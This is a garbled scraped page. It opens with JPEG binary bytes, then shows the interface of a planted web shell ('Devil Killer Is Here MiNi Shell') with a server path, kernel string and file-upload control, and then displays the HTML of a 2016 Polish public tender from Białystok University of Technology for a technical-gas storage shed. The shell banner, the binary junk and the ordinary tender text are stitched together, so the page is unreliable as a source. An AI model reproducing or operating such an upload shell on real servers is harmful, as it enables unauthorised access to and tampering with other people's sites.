JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160225/42176-N-2016.html

<p class="kh_header"><b>Białystok: Opracowanie kompletnej dokumentacji projektowej oraz budowa wiaty magazynowej na gazy techniczne z instalacją gazową wraz z instalacjami wyciągowymi na potrzeby Wydziały Elektrycznego Politechniki Białostockiej w Białymstoku przy ul. Zwierzynieckiej 10 -DO-120.362/3/16</b><br>
<b>Numer ogłoszenia: 42176 - 2016; data zamieszczenia: 25.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Białostocka , ul. Wiejska 45A, 15-351 Białystok, woj. podlaskie, tel. (085) 7469750, faks (085) 7469752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pb.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej dokumentacji projektowej oraz budowa wiaty magazynowej na gazy techniczne z instalacją gazową wraz z instalacjami wyciągowymi na potrzeby Wydziały Elektrycznego Politechniki Białostockiej w Białymstoku przy ul. Zwierzynieckiej 10 -DO-120.362/3/16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej oraz budowa wiaty magazynowej na gazy techniczne z instalacją gazową wraz z instalacjami wyciągowymi, na potrzeby Wydziały Elektrycznego Politechniki Białostockiej w Białymstoku przy ul. Zwierzynieckiej 10 zgodnie z załączonym programem funkcjonalno- użytkowym 
i innymi dokumentami stanowiącymi załącznik nr 1 do SIWZ a w szczególności:
a)	opracowanie dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót, z przygotowaniem odpowiednich wniosków w celu uzyskania odpowiednich decyzji, opinii, uzgodnień, a także zapewnienie nadzoru autorskiego w okresie realizacji robót budowlanych;
b)	wykonanie robót budowlanych, na podstawie opracowanej dokumentacji technicznej wraz z :
- pełną obsługę geodezyjną (w tym inwentaryzacją geodezyjną podwykonawczą), 
- organizacją i zabezpieczeniem budowy oraz czynnościami i dokumentami niezbędnymi do przekazania obiektu do użytkowania;
2)	Zamówienie składa się z dwóch etapów.
3)	Zamówienie  obejmuje sporządzenie: 
3) 1. projektu budowlanego, wykonawczego (oddzielnie każda branża i każdy rodzaj instalacji), przedmiaru robót(oddzielnie każda branża i każdy rodzaj instalacji) w ilości:
a)	projekt budowlany umożliwiający uzyskanie pozwolenia na budowę: 5 egz.;
b)	projekty wykonawcze odrębne w poszczególnych branżach i odrębne na poszczególne instalacje: po 4  egz.;
c)	przedmiary robót: po 2 egz. 
d)	Szczegółowe specyfikacje techniczne wykonania i odbioru robót w poszczególnych branżach: po 4 egz. 
e)	Wersję elektroniczną opracowania w formacie pdf i edytowalnej ogólnie dostępnej.
Wykonanie wielobranżowej inwentaryzacji w zakresie niezbędnym do sporządzenia dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót, przygotowanie wniosków niezbędnych do uzyskania decyzji, opinii, uzgodnień; 
3) 2. wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej dokumentacji; przeprowadzenie wymaganych prób i badań; przygotowanie dokumentów związanych z oddaniem obiektu do użytku.
4)	W przypadku wskazania w programie funkcjonalno-użytkowym nazw, znaków towarowych lub typów materiałów czy produktów lub norm, aprobaty, specyfikacje czy systemy itp., o których mowa w art. 29 ust. 3 i art. 30 ust. 1-3 ustawy, ma to na celu wskazanie parametrów jakościowych. Zamawiający dopuszcza zastosowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewniają  uzyskanie parametrów technicznych nie gorszych od określonych w programie funkcjonalno -użytkowym. 
5)	W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań określonych w dokumentacji przetargowej, wykonawca zobowiązany jest do spełnienia wymogu wynikającego z art. 30 ust. 5 ustawy. 
6)	Wymagany okres gwarancji: 36 miesięcy od daty podpisania protokołu odbioru końcowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.24.14.00-0, 45.21.44.10-7, 45.33.30.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Oferta musi być zabezpieczona wadium: w wysokości: 3 000 złotych.
2)	Wadium musi obejmować okres związania ofertą.
3)	Wadium może być wniesione w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
4)	Wadium musi być wniesione przed upływem terminu składania ofert.
5)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
PEKAO S.A. O/BIAŁYSTOK NR 30 1240 1154 1111 0000 2148 7604
z dopiskiem: DO-120.362/3/16.
6)	Wadium w pieniądzu uznaje się za wniesione z chwilą wpływu środków na rachunek bankowy Zamawiającego. 
7)	W przypadku wnoszenia wadium w formie innej niż w pieniądzu, oryginał dokumentu wadium należy złożyć
w Dziale Zamówień Publicznych Politechniki Białostockiej, ul. Zwierzyniecka 6 pok. 4, 15-333 Białystok, w terminie wyznaczonym na złożenie ofert.
8)	W przypadku, gdy Wykonawca wnosi wadium formie innej niż w pieniądzu, z treści dokumentu musi jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaistniały okoliczności, o których mowa w ppkt 10 i 11 bez potwierdzenia tych okoliczności.
9)	Wadium wnosi się przed upływem terminu składania ofert, wadium musi obejmować okres związania ofertę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia tego warunku Wykonawca winien wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował co najmniej 1 zamówienie polegające na wykonaniu dokumentacji projektowej, złożonej z projektu budowlanego i projektów wykonawczych wraz z  wykonaniem robót budowlanych obiektu budowlanego z instalacją gazów technicznych (w systemie zaprojektuj i wybuduj), ewentualnie oddzielnie 1 zamówienia na wykonanie dokumentacji projektowej złożonej z projektu budowlanego i projektów wykonawczych obiektu budowlanego z instalacją gazów technicznych oraz oddzielnie 1 zamówienie  polegające na wykonaniu robót budowlanych obiektu budowlanego 
z instalacją gazów technicznych -zał. nr 5 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.1. Postanowienia dotyczące wnoszenia oferty wspólnej przez dwóch lub więcej Wykonawców
W przypadku składania jednej oferty przez dwa lub więcej podmiotów (Wykonawców ubiegających się wspólnie 
o udzielenie zamówienia np. konsorcja, spółki cywilne) oferta spełniać musi następujące wymagania:
1)	W przypadku złożenia oferty przez podmioty występujące wspólnie, Wykonawcy ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być sporządzone tak jak zapisano w SIWZ w pkt 10 ppkt 11 SIWZ.
2)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
3)	W odniesieniu do oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu oceny spełnienia warunków udziału w postępowaniu, tj. warunku posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, a także sytuacji ekonomicznej i finansowej Wykonawcy występujący wspólnie musza spełniać łącznie.
4)	W odniesieniu do oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu wykazania braku podstaw do wykluczenia, każdy z Wykonawców występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ust. 5 ustawy Pzp.
5)	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałych.
6.2. Pozostałe dokumenty i oświadczenia nie wymienione w pkt  6.
1)	wypełniony formularz ofertowy wraz z zestawieniem kosztów (na/wg załączonego wzoru druku - zał. nr 2 do SIWZ); 
2)	pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy; 
3)	oświadczenie o powierzaniu bądź niepowierzaniu podwykonawcy wykonania części zamówienia (na Formularzu ofertowym);
4)	oświadczenie o potwierdzeniu warunków gwarancji jak w pkt. 3 SIWZ oraz we wzorze umowy (na Formularzu ofertowym).
5)	Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych  do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów  w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązany jest, w szczególności załączyć pisemne zobowiązanie tych  podmiotów(wg/na zał. Nr 7 do siwz) lub inny dokument potwierdzający oddanie Wykonawcy do dyspozycji niezbędnych  zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Pisemne zobowiązanie do oddania do dyspozycji niezbędnych zasobów powinno być złożone w formie oryginału lub notarialnie poświadczonej kopii, natomiast dokumenty dotyczące innego, pozwalające na wykazanie spełnienia warunków, jeżeli zostały złożone w formie kopii  muszą być poświadczone za zgodność  z oryginałem przez te podmioty. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust 2b ustawy, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Treść zobowiązania podmiotu trzeciego lub innego dokumentu potwierdzającego  oddanie wykonawcy do dyspozycji niezbędnych zasobów powinna określać: 
a)	zakres dostępnych Wykonawcy zasobów innego podmiotu;
b)	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia;
c)	charakter stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy oraz podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy.
Udostępnienie potencjału dotyczącego wiedzy i doświadczenia wiąże się z udziałem podmiotu udostępniającego w realizacji zamówienia, np. w formie podwykonastwa, konsultacji, doradztwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji roboty budowlanej - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy
1.	Zmawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy, w szczególności w razie nadzwyczajnej zmiany stosunków, w tym zmiany przepisów, w oparciu o które realizowana jest niniejsza Umowa
2.	Zmiany Umowy mogą dotyczyć:
1)	warunków płatności wynagrodzenia, w tym w związku z koniecznością wykonania robót zamiennych, 
o których mowa w §9 niniejszej umowy,
2)	terminu realizacji zamówienia, 
3)	wykonania dodatkowych prac niezbędnych do wykonania przedmiotu zamówienia, których nie można było przewidzieć,
4)	podwykonawstwa, w zakresie powierzenia Podwykonawcom innej części zamówienia niż wskazana w Ofercie Wykonawcy.
3.	Zmiany, o których mowa w ust. 2 mogą być dokonane w następujących przypadkach:
1)	 konieczność zmiany terminu wykonania zamówienia z powodu:
a)	działania siły wyższej, tj. nadzwyczajnego zdarzenia lub okoliczności, których nie można było ani przewidzieć ani mu zapobiec,
b)	z przyczyn zależnych od Zamawiającego, 
c)	zmiany okoliczności wymagającej przesunięcia terminów poszczególnych czynności lub płatności, 
w tym w przypadku wystąpienia konieczności wykonania robót zamiennych lub dodatkowych, a także 
w przypadkach zaistnienia okoliczności, nie leżących po stronie Wykonawcy, a uniemożliwiających mu, dotrzymania terminu wykonania zamówienia lub też w istotny sposób utrudniających możliwość spełniania świadczenia w terminie.
d)	jeżeli zmiany są niezbędne dla prawidłowej realizacji przedmiotu umowy, 
2)	zawsze, gdy zmiany są korzystne dla Zamawiającego, 
3)	konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.,
4)	zmiany przepisów prawa (w tym przepisów podatkowych) mająca wpływ na warunki realizacji Umowy.
4.	Strona wnioskująca o zmianę Umowy, przedkłada drugiej Stronie pisemne uzasadnienie konieczności wprowadzenia zmian do Umowy. 
5.	Zmiany mogą być inicjowane przez Zamawiającego lub Wykonawcę, z tym zastrzeżeniem, że żaden z powyższych zapisów nie obliguje Zamawiającego do wprowadzenia jakiejkolwiek zmiany, a jedynie wprowadza taką możliwość.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych 
Politechniki Białostockiej
ul. Zwierzyniecka 6 pok. 4 
15-333 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2016 godzina 10:45, miejsce: Dział Zamówień Publicznych 
Politechniki Białostockiej
ul. Zwierzyniecka 6 pok. 4 
15-333 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Harmonogram prac i zakres opracowania: 
a)	Etap I, część I; Wykonawca przygotuje, opracuje i przekaże Zamawiającemu, Politechnice Białostockiej, wniosek o wydanie środowiskowych uwarunkowań inwestycji wraz z kartą informacyjną inwestycji, w tym uwzględniając Obszar Natura 2000 i wpływ na ten obszar; wniosek o wypis z rejestru gruntów oraz wniosek o wydanie mapy zasadniczej. Wnioski Wykonawca przygotuje w terminie 7 dni od dnia podpisania umowy.
b)	Etap I, część II; Po przekazaniu przez Zamawiającego Wykonawcy informacji na piśmie o zakończeniu postępowania w sprawie środowiskowych uwarunkowań oraz przekazaniu mapy zasadniczej i wypisu z rejestru gruntów - Wykonawca  w terminie 7 dni przygotuje, opracuje i przekaże Zamawiającemu wniosek o wydanie właściwej decyzji dotyczącej warunków zabudowy. 
c) Etap I, część III; Następnie po przekazaniu przez Zamawiającego Wykonawcy informacji na piśmie o zakończeniu postępowania w sprawie o wydanie właściwej decyzji dotyczącej warunków zabudowy, Wykonawca  w terminie do 28 dni przygotuje, opracuje i przekaże Zamawiającemu wniosek o wydanie decyzji o pozwoleniu na budowę oraz  wykona i przekaże Zamawiającemu projekt budowlany z wymaganymi prawem uzgodnieniami (w tym bhp i ppoż.) oraz projekt wykonawczy. Zakończenie etapu I nastąpi  po uzyskaniu przez Zamawiającego decyzji o pozwoleniu na budowę (w tym odebraniu od Wykonawcy projektu budowlanego i wykonawczego). 
d)	Etap II; Realizacja przez Wykonawcę planowanego przedsięwzięcia w terminie max 60 dni od dnia przekazania przez Zamawiającego placu budowy. Uzyskanie w razie konieczności, mając stosowne upoważnienia od Zamawiającego, pozytywnego stanowiska Komendy Miejskiej Państwowej Straży Pożarnej w Białymstoku w zakresie wykonania obiektu zgodnie z projektem budowlanym i spełnienia wymagań przeciwpożarowych oraz Państwowego Powiatowego Inspektoratu Sanitarnego w Białymstoku w sprawie potwierdzenia zgodności wykonania obiektu budowlanego z projektem budowlanym. Sporządzenie dokumentacji powykonawczej i przygotowanie i przekazanie Zamawiającemu wniosku o uzyskanie decyzji 
o pozwoleniu na użytkowanie.
2)	Wymagany termin realizacji robót budowlanych: max 60 dni od dnia przekazania przez Zamawiającego placu budowy; termin realizacji robót budowlanych (oprócz ceny) stanowi kryterium, którym Zamawiający będzie kierował się przy wyborze oferty.
3)	Termin płatności: 30 dni od dnia otrzymania prawidłowo wystawionej faktury VAT (z wymaganymi załącznikami)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com